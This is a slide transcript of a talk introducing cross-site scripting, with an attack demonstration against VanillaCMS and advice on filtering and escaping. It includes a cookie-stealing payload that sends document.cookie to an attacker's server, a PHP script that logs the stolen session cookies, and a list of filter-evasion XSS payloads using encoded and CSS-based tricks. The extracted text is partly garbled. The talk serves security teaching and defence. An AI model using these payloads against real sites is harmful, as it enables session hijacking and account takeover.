Security & VanillaCMS An XSS Introduction and Attack Demonstration.

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
JavaScript Forms Form Validation Cookies. What JavaScript can do  Control document appearance and content  Control the browser  Interact with user.
Team Members: Brad Stancel,
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.
Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.
Project 7 Discussion Section XSS and SQL Injection in Rails.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Basic Web Application Security. User Input Kick Your Arse.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Client-Side programming with JavaScript 3
Secure Software Engineering: Input Vulnerabilities
PHP Security.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
CS346 - Javascript 1, 21 Module 1 Introduction to JavaScript CS346.
Prevent Cross-Site Scripting (XSS) attack
CSC 2720 Building Web Applications Cookies, URL-Rewriting, Hidden Fields and Session Management.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
A Security Review Process for Existing Software Applications
Week 7. Lecture 3 PHP Forms. PHP forms In part 2 of this course, we discussed html forms, php form is similar. Lets do a quick recap of the things we.
© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.
Copyright 2007, Information Builders. Slide 1 Understanding Basic HTML Amanda Regan Technical Director June, 2008.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 1 RubyJax Brent Morris/
PHP Workshop ‹#› PHP Security. PHP Workshop ‹#› Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER 2.ESCAPE.
Website Development with PHP and MySQL Saving Data.
PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.
Introduction to Client-Side Web Development Introduction to Client-Side programming using JavaScript JavaScript; application examples 10 th February 2005.
SecurityPHPApril 2010 : [‹#›] PHP Security. SecurityPHPApril 2010 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less.
Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking SoftUni Team Technical Trainers Software University
Cloud = Web, Web = Hacked! Fabio Viggiani. Why Web Apps? Every organization exposes web apps Most common entry point Image source:
Introduction to JavaScript CS101 Introduction to Computing.
Introduction to JavaScript Objects, Properties, Methods.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
HTML JAVASCRIPT. CONTENTS Javascript Example NOSCRIPT Tag Advantages Summary Exercise.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
©SoftMooreSlide 1 Introduction to HTML: Forms ©SoftMooreSlide 2 Forms Forms provide a simple mechanism for collecting user data and submitting it to.
Trevor Jim Nikhil Swamy Michael Hicks Defeating Script Injection Attacks with Browser-Enforced Embedded Policies Jason FroehlichSeptember 24, 2008.
ASP-2-1 SERVER AND CLIENT SIDE SCRITPING Colorado Technical University IT420 Tim Peterson.
Since you’ll need a place for the user to enter a search query. Every form must have these basic components: – The submission type defined with the method.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
1 CSC160 Chapter 1: Introduction to JavaScript Chapter 2: Placing JavaScript in an HTML File.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
S ECURE P ROGRAMMING NOTES 08 XSS 1. Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the trusted.
PREVENTING INJECTION ATTACKS.
Chapter 13 Security Methods Part 2. xss.php Script 13.4 on page 419 ss.php
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Unit 4 Working with data. Form Element HTML forms are used to pass data to a server. A form can contain input elements like text fields, checkboxes, radio-buttons,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Group 18: Chris Hood Brett Poche
Project Management: Messages
Example – SQL Injection
A Security Review Process for Existing Software Applications
Performance and User Experience Improvements to the ASU/NASA Space Grant Website
Security concerns of web applications with database access
PHP: Security issues FdSc Module 109 Server side scripting and
Web Systems Development (CSC-215)
Lecture 27 Security I April 4, 2018 Open news web sites.
Presentation transcript:

Security & VanillaCMS An XSS Introduction and Attack Demonstration

XSS: An Introduction “Cross-Site Scripting” Using client-side code to send sensitive information off to far-away places. eg. Javascript

XSS: An Introduction Bobby Tables

XSS: An Introduction Mallory Oh shit.

XSS: An Introduction That script could be: alert('HA HA.');alert('Survive make your time.');

XSS: An Introduction That script could be: document.write(document.cookie);

XSS: An Introduction That script could be: document.write( ' '); <img src=" __csuid=489058e83ee2e832;_PHPSESSID=t57tm1fvvdhonprigkdon71677" style="display:none;" />Mallory

XSS: An Introduction Let's have a look at <?php $fh=fopen('xss.log','a'); fwrite($fh,$_SERVER['HTTP_REFERER']. var_export($_GET,1)); fclose($fh); mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon71677' => '',)‏

XSS: An Introduction So what? mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID= t57tm1fvvdhonprigkdon71677 ' => '',)‏

XSS: An Introduction Steal the cookie. Get the URL of the CMS. Log in at will, exposing the very soft underbelly that is the CMS. Time for a demo.

Filtering and Escaping Sometimes are conflated, with side-effects being things like backslashes or entity tags found in stored data. This is all very well and good, but what happens if you want to put this into an message or save out to a text document? “Strip out all tags!” can result in mangled content: eg., 1 bar then”

Filtering and Escaping Validation & Filtering: Checking for and getting rid of the nasties. Checking data is of the correct type, eg. addresses, postcodes, message text. Stripping out control characters, fixing multibyte encoding shenanigans with iconv(). Escaping: Packaging data up for transport. mysql_real_escape_string() for MySQL strings. htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML. urlencode() for query params.

Filtering and Escaping Why don't we just kill any tags we find? alert('a') ”> <IMG SRC=javascr ipt:aler t('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72 &#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> alert('a') alert("a");// RIPT>alert('a'); RIPT> <img src=”javascript:alert('a')” <IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' )‏ " >

Filtering and Escaping Why don't we just kill any tags we find? <iframe src= < BODY{-moz-binding:url(" žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)‏ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Filtering and Escaping Why don't we just kill any tags we find? <DIV STYLE="background-image:\0075\0072\006C\0028'\006a \0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061 exp/* alert('a');.x{background-image:url("javascript:alert('a')");} ]]>

Filtering and Escaping Yeah, no. The transport is HTML; package it appropriately. Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff. Use it even on the things you “trust” like $_SERVER['PHP_SELF'], or REQUEST_URI. It gets hard when you need to put user data into src=”” and style=”” fields; suggest using a whitelist instead, no matter how much of a pain it is to implement. (Or in the case of images and other files, generating the filename for them.)‏

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.